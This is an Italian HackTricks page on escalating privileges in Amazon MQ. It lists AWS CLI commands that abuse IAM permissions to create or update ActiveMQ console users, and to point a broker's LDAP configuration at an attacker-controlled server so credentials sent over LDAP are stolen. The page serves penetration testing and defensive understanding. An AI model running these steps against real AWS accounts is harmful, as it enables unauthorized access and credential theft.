AWS - MQ Privesc

Sostieni HackTricks

MQ

Per ulteriori informazioni su MQ controlla:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Con queste autorizzazioni puoi creare un nuovo utente in un broker ActimeMQ (questo non funziona in RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Impatto Potenziale: Accesso alle informazioni sensibili navigando attraverso ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Con queste autorizzazioni è possibile creare un nuovo utente in un broker ActimeMQ (questo non funziona in RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Impatto Potenziale: Accesso alle informazioni sensibili navigando attraverso ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Se un broker sta utilizzando LDAP per l'autorizzazione con ActiveMQ. È possibile cambiare la configurazione del server LDAP utilizzato con uno controllato dall'attaccante. In questo modo l'attaccante sarà in grado di rubare tutte le credenziali inviate tramite LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Se riuscissi a trovare le credenziali originali usate da ActiveMQ potresti eseguire un MitM, rubare le credenziali, usarle nel server originale e inviare la risposta (forse riutilizzando le credenziali rubate potresti farlo).

Impatto Potenziale: Rubare le credenziali di ActiveMQ

Supporta HackTricks

Last updated